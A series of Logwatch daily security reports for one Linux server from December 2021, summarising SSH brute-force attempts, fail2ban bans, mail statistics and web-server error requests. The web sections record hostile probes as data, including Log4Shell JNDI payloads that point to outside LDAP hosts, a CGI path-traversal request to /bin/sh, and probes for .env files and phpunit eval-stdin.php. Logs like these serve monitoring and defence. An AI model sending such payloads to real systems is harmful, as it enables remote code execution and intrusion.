unknown (45.137.197.35.bc.googleusercontent.com): 1 Time(s)
unknown (81.70.163.61): 1 Time(s)
unknown (server.kompraqui.com): 1 Time(s)
Invalid Users:
Unknown Account: 108 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
8.793K Bytes accepted 9,004
8.793K Bytes sent via SMTP 9,004
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
1405 Connections
1356 Connections lost (inbound)
1405 Disconnections
1 Removed from queue
1 Sent via SMTP
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 1 Time(s)
Failed logins from:
35.197.137.45 (45.137.197.35.bc.googleusercontent.com): 13 times
81.70.163.61: 15 times
89.97.218.142 (89-97-218-142.ip19.fastwebnet.it): 2 times
103.133.57.250: 2 times
106.13.74.61: 16 times
119.29.77.63: 30 times
159.192.209.87: 1 time
164.90.203.55: 1 time
165.227.16.82: 28 times
186.178.57.81 (81.57.178.186.static.anycast.cnt-grms.ec): 6 times
188.166.221.11: 30 times
189.254.255.3 (customer-189-254-255-3-sta.uninet-ide.com.mx): 4 times
194.170.156.9: 17 times
202.101.186.218: 35 times
219.145.61.20: 1 time
Illegal users from:
2001:470:1:c84::31: 1 time
undef: 72 times
24.224.178.87 (host-24-224-178-87.public.eastlink.ca): 2 times
31.184.198.71: 1 time
35.197.137.45 (45.137.197.35.bc.googleusercontent.com): 1 time
79.140.124.247: 2 times
79.153.190.158 (158.red-79-153-190.dynamicip.rima-tde.net): 2 times
81.70.163.61: 1 time
82.65.33.144 (82-65-33-144.subs.proxad.net): 2 times
89.97.218.142 (89-97-218-142.ip19.fastwebnet.it): 2 times
106.13.74.61: 9 times
110.136.232.7: 2 times
119.29.77.63: 18 times
134.236.247.145: 1 time
146.185.79.101: 1 time
162.214.53.159 (server.kompraqui.com): 1 time
165.227.16.82: 18 times
188.166.221.11: 20 times
189.254.255.3 (customer-189-254-255-3-sta.uninet-ide.com.mx): 1 time
194.170.156.9: 9 times
195.133.18.104: 1 time
202.101.186.218: 14 times
**Unmatched Entries**
Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (0,ssh-connection) [preauth] : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 Jahre, 10 Monate
- 1
- 0
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Mon Dec 20 04:42:05 2021
Date Range Processed: yesterday
( 2021-Dec-19 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 28:28 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 5 sites probed the server
109.74.204.123
161.35.230.3
61.219.11.151
64.227.99.233
66.240.205.34
Requests with error response codes
400 Bad Request
null: 8 Time(s)
mstshash=Domain: 4 Time(s)
/: 3 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 2 Time(s)
default.asp: 2 Time(s)
mstshash=Administr: 2 Time(s)
/.env: 1 Time(s)
/10196510: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s)
/config/getuser?index=0: 1 Time(s)
/manager/text/list: 1 Time(s)
7: 1 Time(s)
\xBB: 1 Time(s)
}\xD1>\xD8\x8E\xD1{\x1D\xFC\xF2kr\xC6\x01\ ... xBE\x00\xBD\xC0: 1 Time(s)
500 Internal Server Error
/: 21 Time(s)
/.env: 3 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/?a=%24%7Bjndi%3Aldap%3A//193.3.19.159%3A53/c%7D: 1 Time(s)
/GponForm/diag_Form?style/: 1 Time(s)
/actuator/health: 1 Time(s)
/favicon.ico: 1 Time(s)
/owa/: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (101.96.76.242): 43 Time(s)
root (1.116.25.72): 41 Time(s)
root (121.201.34.21): 34 Time(s)
root (211.157.148.2): 33 Time(s)
root (162.243.20.232): 31 Time(s)
root (1.14.49.221): 30 Time(s)
root (211.219.114.39): 27 Time(s)
root (119.29.60.96): 25 Time(s)
root (125.141.139.7): 25 Time(s)
unknown (162.243.20.232): 19 Time(s)
root (111.198.33.54): 17 Time(s)
root (139.198.13.109): 17 Time(s)
unknown (139.198.13.109): 17 Time(s)
unknown (121.201.34.21): 16 Time(s)
unknown (211.157.148.2): 16 Time(s)
root (114.67.116.17): 15 Time(s)
unknown (1.14.49.221): 14 Time(s)
unknown (119.29.60.96): 12 Time(s)
unknown (211.219.114.39): 11 Time(s)
root (183.194.212.16): 10 Time(s)
root (120.92.79.133): 7 Time(s)
unknown (101.96.76.242): 7 Time(s)
unknown (111.198.33.54): 7 Time(s)
unknown (1.116.25.72): 6 Time(s)
unknown (114.67.116.17): 6 Time(s)
unknown (125.141.139.7): 6 Time(s)
unknown (183.194.212.16): 6 Time(s)
root (115.221.81.85): 4 Time(s)
root (220.179.231.222): 4 Time(s)
unknown (120.92.79.133): 4 Time(s)
root (121.66.109.90): 3 Time(s)
root (36.110.228.254): 3 Time(s)
unknown (182.48.114.140): 3 Time(s)
root (40.125.214.159): 2 Time(s)
unknown (ip1f13d9ed.dynamic.kabel-deutschland.de): 2 Time(s)
unknown (wnpgmb0538w-ds01-138-65.dynamic.bellmts.net): 2 Time(s)
news (125.141.139.7): 1 Time(s)
root (114.7.162.198): 1 Time(s)
root (36.91.61.178): 1 Time(s)
unknown (115.221.81.85): 1 Time(s)
unknown (116.52.144.172): 1 Time(s)
unknown (220.179.231.222): 1 Time(s)
unknown (36.133.163.35): 1 Time(s)
unknown (40.125.214.159): 1 Time(s)
unknown (45.141.84.10): 1 Time(s)
Invalid Users:
Unknown Account: 160 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
5 Miscellaneous warnings
13.067K Bytes accepted 13,381
13.067K Bytes sent via SMTP 13,381
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
29 Connections
11 Connections lost (inbound)
29 Disconnections
1 Removed from queue
1 Sent via SMTP
1 SMTP dialog errors
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
1.14.49.221: 30 times
1.116.25.72: 41 times
36.91.61.178: 1 time
36.110.228.254: 3 times
40.125.214.159: 2 times
101.96.76.242 (ci96.76-242.netnam.vn): 43 times
111.198.33.54: 17 times
114.7.162.198 (114-7-162-198.resources.indosat.com): 1 time
114.67.116.17: 15 times
115.221.81.85: 4 times
119.29.60.96: 25 times
120.92.79.133: 7 times
121.66.109.90: 3 times
121.201.34.21 (121.201.34.21): 34 times
125.141.139.7: 26 times
139.198.13.109: 17 times
162.243.20.232: 31 times
183.194.212.16 (.): 10 times
211.157.148.2: 33 times
211.219.114.39: 27 times
220.179.231.222: 4 times
Illegal users from:
2001:470:1:c84::16: 1 time
undef: 120 times
1.14.49.221: 14 times
1.116.25.72: 6 times
31.19.217.237 (ip1f13d9ed.dynamic.kabel-deutschland.de): 2 times
36.133.163.35: 1 time
40.125.214.159: 1 time
45.83.66.144: 1 time
45.141.84.10: 1 time
64.62.197.152: 1 time
101.96.76.242 (ci96.76-242.netnam.vn): 7 times
109.74.204.123 (li151-123.members.linode.com): 1 time
111.198.33.54: 7 times
114.67.116.17: 6 times
115.221.81.85: 1 time
116.52.144.172: 1 time
119.29.60.96: 12 times
120.92.79.133: 4 times
121.201.34.21 (121.201.34.21): 16 times
125.141.139.7: 6 times
139.198.13.109: 17 times
162.243.20.232: 19 times
182.48.114.140: 3 times
183.194.212.16 (.): 6 times
193.169.254.138: 1 time
207.161.138.65 (wnpgmb0538w-ds01-138-65.dynamic.bellmts.net): 2 times
211.157.148.2: 16 times
211.219.114.39: 11 times
220.179.231.222: 1 time
**Unmatched Entries**
fatal: Unable to negotiate a key exchange method [preauth] : 1 time(s)
Protocol major versions differ for 109.74.204.123: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Nmap-SSH1-Hostkey : 1 time(s)
Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (0,ssh-connection) [preauth] : 1 time(s)
Protocol major versions differ for 109.74.204.123: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-NmapNSE_1.0 : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 Jahre, 10 Monate
- 1
- 0
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sun Dec 19 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-18 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 31:31 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
195.189.96.245 -> 91.200.100.126:4444: 1 Time(s)
A total of 7 sites probed the server
103.153.76.212
139.59.30.25
216.238.73.231
34.77.162.18
5.188.210.227
61.219.11.151
66.240.205.34
Requests with error response codes
400 Bad Request
null: 42 Time(s)
/: 14 Time(s)
\x5Cxbf\x5Cx02\x5Cx00\x5Cx88\x5Cx13\x5Cx00 ... \x5Cx9e\x5Cx16E: 4 Time(s)
xmlns:xsd=\x22http://www.w3.org/2001/XMLSchema\x22: 3 Time(s)
mstshash=Domain: 2 Time(s)
!\xF0JU\x19\xD5\xE4\xDA\xD7v\xBFw\x9C\xBB\x98\x84\xB4Ls: 1 Time(s)
&}\xBA[w}u\xA43\x9A\x823\xEEuz;f\xEAg|\xB7 ... C0$\x13\x05\xC0: 1 Time(s)
)FQ\x09\xF2A}\xDEpF\xEC\xB7\x9E6\x99\xA9\x ... C0\xAE\xC0+\xC0: 1 Time(s)
/c/version.js: 1 Time(s)
/flu/403.html: 1 Time(s)
/stalker_portal/c/version.js: 1 Time(s)
/stream/live.php: 1 Time(s)
/streaming/clients_live.php: 1 Time(s)
/system_api.php: 1 Time(s)
1\x0F\x9E\xDA4\xAFU\xA8h\xDC\x0F\xEB\x9D?\ ... C\x04\xF8\xF97Q: 1 Time(s)
2\x7F\xC4\x94\x9E\xF6v\xD5\xCC\x97\xB7\xB2 ... x09\xC0\x13\xC0: 1 Time(s)
91.200.100.126:4444: 1 Time(s)
E\x98\x07\xC5\xAA\x87\xD5\xB7\xCAg\x1AU\xC ... D\x12\xFBaU\xA1: 1 Time(s)
F7lV\xFC;SniD=,2\xF9:\x88\xC9Y\xD2k\xBD: 1 Time(s)
G=\xC9\xA0\xF77\xF9\xEE\xDF\xD3,\x14l\xA1\ ... C\x00<\x00/\x00: 1 Time(s)
G\xC3\x00\xAC: 1 Time(s)
I\xD9M\xDB9\x04v/A\xC6\xC6\xD4\x01%\xA4\xF ... x09\xC0\x13\xC0: 1 Time(s)
Ih7L\xC7\x17Qr\xD4\x06sg\xD8\x9E\xBC\xB9\x ... C\x00<\x00/\x00: 1 Time(s)
K\xC8\x94\x1E\x09\xC4\xDF: 1 Time(s)
Lo}\x0F'Z\x12\x96Di\xE0\x8F\xA4\x19\xE9jNC ... x09\xC0\x13\xC0: 1 Time(s)
U\xBC\x9Ak\x88\x9Ad\x1C0\xEB\x0E: 1 Time(s)
Wr\xD1+a\x17\x8C&\x88\xE2\xBA\xC1\x8C\xBC\ ... 9\xBC2\xB1}\xEF: 1 Time(s)
\x01\xA7\xE3\xDB\x09K}\x96\x96\x1B\x8B8\x9 ... C0\xAE\xC0+\xC0: 1 Time(s)
\x06f\xB9\x13f\xFF\x08R\xA6\xAC\x85: 1 Time(s)
\x09\xBF\x98\x02\x1Cx\x02H\xD7\x8C7)\xEC\x ... x09\xC0\x13\xC0: 1 Time(s)
\x0C\x8A\x10\xC6\x80\xC7Y-\xB9\xA7\xF4\xF6 ... xEB\xC5\x80\x82: 1 Time(s)
\x1A\x82\xC96]\x8A}sv\xE9H\xCF^\xC4|\x015\xE4b\xBE: 1 Time(s)
\x80\xC7\x87\xA1\x04\xC0\xAF\x92\x98\xC2\x ... x13\xC0\x11\x00: 1 Time(s)
\x8E\xD4\x1A\xCE\xC8\xDA\xD4LG\xC0F\xABa\x ... 1\x16\xD7{\xD38: 1 Time(s)
\x97\x05\xFD\xE7\x17<\x94N\x16v\x812\xF6\x ... x09\xC0\x13\xC0: 1 Time(s)
\x98\xD7\xD1h\xB7\x101\x8B\x9A;Q(z\xD0\xC7\xEE\x8A\xA3: 1 Time(s)
\x9A\x0FR\xA3,_\xE3E\xA2\xF8\xFF\xAC&\xCEm ... x8F\x99\x9A\x05: 1 Time(s)
\xA0\x94\x0B\x1D\xDF: 1 Time(s)
\xA0wj\x9A^\xF4\xA6_\x1A\x9A\xB3\xA6\xC1\x ... x09\xC0\x13\xC0: 1 Time(s)
\xA17\xC9\xA6U\x01\xCA!\xA1\xBFp[8xj\xF6l\ ... x09\xC0\x13\xC0: 1 Time(s)
\xAB\x9Eq\x98: 1 Time(s)
\xB1\x04e\x80\xB3\x1E\x1E\x5C\xCD\x07H\x88 ... 90\x9B\xB3\xC3Y: 1 Time(s)
\xB1\x88\x84\xE2\xE4]\xE4\xE5\xB9\xB5JO\xA ... C0\xAE\xC0+\xC0: 1 Time(s)
\xB2\xF0u\x08\xF0(w?>L\x0Et7j\x90: 1 Time(s)
\xB6\xC0\xD2!\xD3\x141\xC4#\x8D\x80\xCBI\x ... x13\xC0\x11\x00: 1 Time(s)
\xB9\xDB\xF6\x1F\xA8\x86\x15d\x12\xAA\xCA\ ... C0\xAE\xC0+\xC0: 1 Time(s)
\xBC\x1A\xBC\x8BB\x02GP\x86M\x04\x82\x84\x ... C0\xAD\xC0$\xC0: 1 Time(s)
\xBC\xAAw\xFDP\xCD\xEEd\x88\xF3\x18\xC9\x7 ... x09\xC0\x13\xC0: 1 Time(s)
\xC2\xD2\xA2XB\xB4E\xDDh5\x22\xAD\xAB\xE5: 1 Time(s)
\xCC\xACJ\x15\xB9\xA3\x22u\xE2\x9F\xC1\x0B ... x09\xC0\x13\xC0: 1 Time(s)
\xD2\xC0\x7F\x0C\xB2\x88\xB2\x86\x10Q\x98y ... x1D\xD9\xBF\xB3: 1 Time(s)
\xD6\xA6K\xC3\xC2\x99\xC4v\xDE\x99\x1A\xFF ... x09\xC0\x13\xC0: 1 Time(s)
\xD7\x0BA\x1F\xE4\xC5\xFE\x03\x0F\x04q<\xC ... C0\xAE\xC0+\xC0: 1 Time(s)
\xD9\xC1\x98\x9B\x88x\xCAjdRR\x0F(K^\xE625 ... C0\xAE\xC0+\xC0: 1 Time(s)
\xDDb/y\x1E\xC1Om\x83\xFD\xA7\x8B\x07v\xA0 ... \xFC\xD2qw\xC6>: 1 Time(s)
\xE1\xB3\xA5,~\xC2\x8D\x22q\x8E\x0F\x04V`\ ... C0\xAE\xC0+\xC0: 1 Time(s)
\xE89#B\xE5\xC6~\xFDL\xEE\x8C\x22G\xE4Wg\xD3\x10=\x03#\xBE: 1 Time(s)
\xED\x12\x09: 1 Time(s)
\xF0zP\x94~\x17\xDEmG;\x08\x86N\xA8\xEC-\x ... x13\xC0\x11\x00: 1 Time(s)
\xF6\xC8\x9B\x5C\xAB\xD1\xEC\xD4\x91K\xDE\ ... x09\xC0\x13\xC0: 1 Time(s)
\xF9\xA9: 1 Time(s)
\xFCx\x9B\x22\xBEa@=\xF1\xE0@C\xD7\xFD\xBD ... x09\xC0\x13\xC0: 1 Time(s)
^$\x1Dv\x05\x09\xF0\xBB\xF3\xD6\xB6\xAA\xF ... x09\xC0\x13\xC0: 1 Time(s)
_\x8F\x9E;\xE8|\xF6\x91\xCC&d\xD5\x85G\xFD ... x09\xC0\x13\xC0: 1 Time(s)
c\xAA\x8A\x7FR\xC9s\x22\xE6\xE0D\xBD\xAB\x ... x09\xC0\x13\xC0: 1 Time(s)
j\x95d\xAC'\xAD\xC4\xFCO-\xDA\x85\xD5\xC7\ ... x09\xC0\x13\xC0: 1 Time(s)
j\xC6\xF5\xB4\xA8\x9E\x9Eb\x07.\xCA\x0E: 1 Time(s)
s?A\x86\xB8pxnTQ\x91\xEB\x99\xA46\xA9j\xE7 ... C0\xAE\xC0+\xC0: 1 Time(s)
uk\xB2\x8D!\x99\xF56\x80\xD9\xA2\xD9y\xAD, ... x09\xC0\x13\xC0: 1 Time(s)
{\x0C\xC8\xE4If\xEFF~\xC6\x95\xED/\xDE\x92\xD7\xA99\xFEE\xE8: 1 Time(s)
499 (undefined)
/: 5 Time(s)
/${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/?id=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/?page=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/?s=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/?v=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/login: 1 Time(s)
500 Internal Server Error
/: 32 Time(s)
/.env: 5 Time(s)
/robots.txt: 5 Time(s)
/nice%20ports%2C/Tri%6Eity.txt%2ebak: 3 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/?q=%hydroparastatae%&va=b&t=hc&ia=web: 1 Time(s)
/Telerik.Web.UI.WebResource.axd?type=rau: 1 Time(s)
/actuator/health: 1 Time(s)
/admin/public/index.html: 1 Time(s)
/c/version.js: 1 Time(s)
/cgi-bin/config.exp: 1 Time(s)
/flu/403.html: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/remote/login: 1 Time(s)
/stalker_portal/c/version.js: 1 Time(s)
/stream/live.php: 1 Time(s)
/streaming/clients_live.php: 1 Time(s)
/system_api.php: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (49.234.30.113): 37 Time(s)
root (111.229.4.66): 33 Time(s)
root (121.4.118.208): 32 Time(s)
root (203.160.55.212): 25 Time(s)
root (36.91.119.221): 24 Time(s)
root (120.133.56.246): 21 Time(s)
root (165.22.220.159): 20 Time(s)
unknown (121.4.118.208): 18 Time(s)
root (139.198.4.166): 14 Time(s)
root (1.116.155.182): 13 Time(s)
unknown (49.234.30.113): 13 Time(s)
unknown (111.229.4.66): 12 Time(s)
unknown (189.180.31.18): 12 Time(s)
root (201-0-89-142.dsl.telesp.net.br): 10 Time(s)
unknown (120.133.56.246): 9 Time(s)
unknown (165.22.220.159): 8 Time(s)
unknown (201-0-89-142.dsl.telesp.net.br): 8 Time(s)
unknown (36.91.119.221): 8 Time(s)
unknown (139.198.4.166): 7 Time(s)
unknown (203.160.55.212): 6 Time(s)
root (189.180.31.18): 4 Time(s)
unknown (1.116.155.182): 4 Time(s)
root (112.19.174.226): 2 Time(s)
root (176.111.173.226): 2 Time(s)
unknown (109.166.153.103): 2 Time(s)
unknown (176.111.173.226): 2 Time(s)
unknown (189.195.123.28): 2 Time(s)
unknown (189.230.37.114): 2 Time(s)
unknown (77.118.110.71.wireless.dyn.drei.com): 2 Time(s)
unknown (h-155-4-0-67.a147.priv.bahnhof.se): 2 Time(s)
unknown (pasarelalora.electron.uv.es): 2 Time(s)
postgres (139.198.4.166): 1 Time(s)
root (164.90.203.55): 1 Time(s)
root (189.195.123.28): 1 Time(s)
unknown (134.236.247.145): 1 Time(s)
unknown (141.98.10.202): 1 Time(s)
unknown (146.185.79.101): 1 Time(s)
unknown (23.154.177.4): 1 Time(s)
Invalid Users:
Unknown Account: 123 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
10.358K Bytes accepted 10,607
10.358K Bytes sent via SMTP 10,607
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
14 Connections
5 Connections lost (inbound)
14 Disconnections
1 Removed from queue
1 Sent via SMTP
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
1.116.155.182: 13 times
36.91.119.221: 24 times
49.234.30.113: 37 times
111.229.4.66: 33 times
112.19.174.226: 2 times
120.133.56.246: 21 times
121.4.118.208: 32 times
139.198.4.166: 15 times
164.90.203.55: 1 time
165.22.220.159: 20 times
176.111.173.226: 2 times
189.180.31.18 (dsl-189-180-31-18-dyn.prod-infinitum.com.mx): 4 times
189.195.123.28 (customer-PUE-123-28.megared.net.mx): 1 time
201.0.89.142 (201-0-89-142.dsl.telesp.net.br): 10 times
203.160.55.212: 25 times
Illegal users from:
2001:470:1:332::9: 1 time
undef: 85 times
1.116.155.182: 4 times
2.57.121.35 (smtp35.kcmoa.com): 1 time
23.154.177.4: 1 time
36.91.119.221: 8 times
49.234.30.113: 13 times
64.62.197.122: 1 time
77.118.110.71 (77.118.110.71.wireless.dyn.drei.com): 2 times
109.166.153.103: 2 times
111.229.4.66: 12 times
120.133.56.246: 9 times
121.4.118.208: 18 times
134.236.247.145: 1 time
139.198.4.166: 7 times
141.98.10.202: 1 time
146.185.79.101: 1 time
147.156.82.79 (pasarelalora.electron.uv.es): 2 times
155.4.0.67 (h-155-4-0-67.A147.priv.bahnhof.se): 2 times
165.22.220.159: 8 times
176.111.173.226: 2 times
189.180.31.18 (dsl-189-180-31-18-dyn.prod-infinitum.com.mx): 12 times
189.195.123.28 (customer-PUE-123-28.megared.net.mx): 2 times
189.230.37.114 (dsl-189-230-37-114-dyn.prod-infinitum.com.mx): 2 times
201.0.89.142 (201-0-89-142.dsl.telesp.net.br): 8 times
203.160.55.212: 6 times
**Unmatched Entries**
Protocol major versions differ for 216.238.73.231: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Nmap-SSH1-Hostkey : 2 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 Jahre, 10 Monate
- 1
- 0
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sat Dec 18 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-17 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 32:32 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 7 sites probed the server
103.153.76.212
157.245.102.144
20.101.106.180
205.185.124.100
216.238.73.231
61.219.11.151
64.227.41.14
Requests with error response codes
400 Bad Request
null: 11 Time(s)
mstshash=Domain: 4 Time(s)
/config/getuser?index=0: 3 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... -MF3zWbyg92AADk: 3 Time(s)
mstshash=Administr: 3 Time(s)
/: 2 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... FX0JBEznOXtAADg: 2 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
7: 2 Time(s)
/.env: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
D\xF0^\xC4\xCA\x16a\xE2\x8Ef\x8Cs\x0C\x97\ ... C0$\x13\x05\xC0: 1 Time(s)
HTTP/1.0: 1 Time(s)
O\x06*\xA2: 1 Time(s)
R\xECG\xDF\x9C\x7F\x1B\xDD\xAE!\xE8\x9A\xB ... H\xCE\x09\x1Ea:: 1 Time(s)
\x01\xB8\xF8AY\xA0]\x87`%\xBC\xD4=w\xBB\x9 ... C0\xAD\xC0$\xC0: 1 Time(s)
\x16\x0E\xCBp\x5C\xEB~\xC1\xE6\xBCW\xDC\x0 ... C0\xAE\xC0+\xC0: 1 Time(s)
\x82m\xD7R\xA3\xF6l~:#x\x15\x0F\x04\xA7\xA ... C\x00<\x00/\x00: 1 Time(s)
\x925\xE0\x1F\x9CB\x8E\x88\xDDv\xEC\xDB~\x ... x09\xC0\x13\xC0: 1 Time(s)
\xC5\xC7\xD4\xA1\xF1S|\xB2\x83H\xF4)\x14X\ ... x09\xC0\x13\xC0: 1 Time(s)
\xC8'!\xEB\x95\xC0\x8A\x94g\xDFm\xB4\xAF\x ... x13\xC0\x11\x00: 1 Time(s)
t\x1B\x1D\xB0\xBF\xA6\x9A\x10\xD1\x98\xCA: 1 Time(s)
t{(a)\xD2\xA1\xC8+T\xB8\xD0.\xC5\xEAt\xBF\xC ... x09\xC0\x13\xC0: 1 Time(s)
xmlns:xsd=\x22http://www.w3.org/2001/XMLSchema\x22: 1 Time(s)
499 (undefined)
/: 10 Time(s)
/${jndi:ldap://31.131.16.127:1389/Exploit}: 1 Time(s)
/login: 1 Time(s)
500 Internal Server Error
/: 29 Time(s)
/.env: 7 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2 ... lxgpsjkgfrra%7D: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
/favicon.ico: 1 Time(s)
/fuel: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/nice%20ports%2C/Tri%6Eity.txt%2ebak: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (180.76.57.58): 36 Time(s)
root (139.59.228.214): 35 Time(s)
root (r201-217-143-51.ir-static.anteldata.net.uy): 33 Time(s)
root (50.142.80.34.bc.googleusercontent.com): 26 Time(s)
unknown (114.80.85.75): 21 Time(s)
root (113.110.166.25): 20 Time(s)
unknown (201.119.167.25): 20 Time(s)
root (106.13.6.113): 19 Time(s)
unknown (r201-217-143-51.ir-static.anteldata.net.uy): 17 Time(s)
unknown (139.59.228.214): 15 Time(s)
unknown (50.142.80.34.bc.googleusercontent.com): 12 Time(s)
root (113.116.5.156): 11 Time(s)
root (203.160.55.212): 11 Time(s)
unknown (106.13.6.113): 11 Time(s)
unknown (180.76.57.58): 11 Time(s)
root (ns3152155.ip-151-106-38.eu): 10 Time(s)
root (201.119.167.25): 9 Time(s)
root (60.255.230.126): 8 Time(s)
unknown (203.160.55.212): 8 Time(s)
unknown (113.110.166.25): 6 Time(s)
root (178-117-237-173.access.telenet.be): 5 Time(s)
unknown (128.187.26.211.sta.commander.net.au): 5 Time(s)
unknown (60.255.230.126): 5 Time(s)
unknown (ns3152155.ip-151-106-38.eu): 5 Time(s)
root (179.112.19.24): 4 Time(s)
root (115.248.153.89): 2 Time(s)
root (128.187.26.211.sta.commander.net.au): 2 Time(s)
unknown (176.125.36.117): 2 Time(s)
unknown (194.61.26.211): 2 Time(s)
unknown (2.195.224.165): 2 Time(s)
unknown (220.177.194.10): 2 Time(s)
unknown (240.94-182-91.adsl-dyn.isp.belgacom.be): 2 Time(s)
unknown (59.29.227.55): 2 Time(s)
